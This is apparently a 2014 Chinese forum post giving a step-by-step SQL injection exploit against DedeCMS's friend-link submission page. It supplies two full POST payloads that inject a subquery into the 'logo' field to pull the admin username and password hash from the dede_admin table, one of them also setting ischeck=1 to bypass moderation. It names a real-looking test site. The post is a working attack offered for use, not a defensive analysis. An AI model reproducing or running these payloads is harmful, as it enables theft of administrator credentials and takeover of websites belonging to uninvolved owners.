一:网站要支持申请友链
url:/plus/flink_add.php
=--------------------------------------------------------利用开始--------------------------
直接填写验证码,抓包
修改POST数据
写人exp:
[AppleScript] 纯文本查看 复制代码 Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`
&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\
validate为验证码,修改提交即可
再打开友情链接
url:plus/flink.php
有个无法显示的图片,查看源码.ok
有部分好像是需要审核的,这里有个过审核的
EXP:
[AppleScript] 纯文本查看 复制代码 Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`’`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`’`&typeid=1&url=http%3A%2F%2F&validate=spen&ischeck=1&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\
测试站:http://help.cnaaa.com/
![C]%E`0BGHL_TYO3X1A64G[H.jpg](data/attachment/forum/201404/30/143337fama1apa0maa1vla.jpg "C]%E`0BGHL_TYO3X1A64G[H.jpg")
| 
发表于 2014-4-30 14:33:47
发表于 2014-5-1 07:15:24
